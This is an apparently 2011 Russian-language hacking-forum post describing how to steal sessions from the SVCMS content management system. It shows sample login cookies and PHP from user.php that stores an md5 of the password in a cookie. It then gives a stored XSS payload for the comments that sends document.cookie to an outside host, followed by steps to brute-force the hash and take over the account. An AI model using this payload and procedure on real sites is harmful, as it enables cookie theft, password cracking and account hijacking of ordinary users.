
04.08.2011, 13:00
|
|
Новичок
Регистрация: 21.06.2005
Сообщений: 0
С нами:
10992741
Репутация:
0
|
|
SVCMS beta 1 (угоняем куки)
Еще один двиг не без прибабаха...
Мега кодеры этого двига при авторизации выдают след.куки:
Код:
__qca=P0-464638314-1305237775445; crocmint_aff=697b75;
POSTAff2Cookie=697b75_137d839c;
POSTAff2TimeCookie=1305037573_1308127486_7;
POSTAff2ClickCookie=d9913101; PAPR_0=1305557527_http%253A//temp/;
SVCMS_userid=1;
SVCMS_md5passwd=e5c72dd4eca5301feca1bb0985eed55f;
SVCMS_randomstring=13123908414e397eb92e187;
PHPSESSID=bmkmssmcvtbcoreee5uqj49vp6
наблюдаем это здесь( user.php):
PHP код:
[COLOR="#000000"][COLOR="#0000BB"][/COLOR][COLOR="#007700"].....
*[/COLOR][COLOR="#0000BB"]Set the cookies
[/COLOR][COLOR="#007700"]*/
private function[/COLOR][COLOR="#0000BB"]set_login_cookies[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]false[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]$expire_val[/COLOR][COLOR="#007700"]= ( ([/COLOR][COLOR="#0000BB"]$logout[/COLOR][COLOR="#007700"]) ? ([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() -[/COLOR][COLOR="#0000BB"]30[/COLOR][COLOR="#007700"]) :[/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]() +[/COLOR][COLOR="#0000BB"]1209600[/COLOR][COLOR="#007700"]);[/COLOR][COLOR="#FF8000"]// 1209600 is two weeks
[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]uniqid[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]time[/COLOR][COLOR="#007700"]());
[/COLOR][COLOR="#0000BB"]$md5_pass[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]md5[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'password'[/COLOR][COLOR="#007700"]] .[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"]);
[/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]= array(
[/COLOR][COLOR="#DD0000"]'SVCMS_userid'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$this[/COLOR][COLOR="#007700"]->[/COLOR][COLOR="#0000BB"]data[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'userid'[/COLOR][COLOR="#007700"]],
[/COLOR][COLOR="#DD0000"]'SVCMS_md5passwd'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$md5_pass[/COLOR][COLOR="#007700"],
[/COLOR][COLOR="#DD0000"]'SVCMS_randomstring'[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$randomstring[/COLOR][COLOR="#007700"],
);
foreach([/COLOR][COLOR="#0000BB"]$cookies[/COLOR][COLOR="#007700"]as[/COLOR][COLOR="#0000BB"]$cookie[/COLOR][COLOR="#007700"]=>[/COLOR][COLOR="#0000BB"]$cookie_value[/COLOR][COLOR="#007700"]) {
[/COLOR][COLOR="#0000BB"]setcookie[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$cookie[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$cookie_value[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$expire_val[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#DD0000"]''[/COLOR][COLOR="#007700"]);
}
return[/COLOR][COLOR="#0000BB"]true[/COLOR][COLOR="#007700"];
}
.........[/COLOR][/COLOR]
И в добавок к этому они оставили активную xss в комментах!
То бишь:
Код:
img = new Image(); img.src = "http://day.mne/svoi.kuki?ciuda="+document.cookie;
-> Регулярим id и хэш, а так же $_SERVER['HTTP_REFERER']
-> брутим хэш (md5)
-> возвращаемся на $_SERVER['HTTP_REFERER']
-> смотрим ник по id (ссылка на нике комментирующих)
-> действуем по совести
|
|
|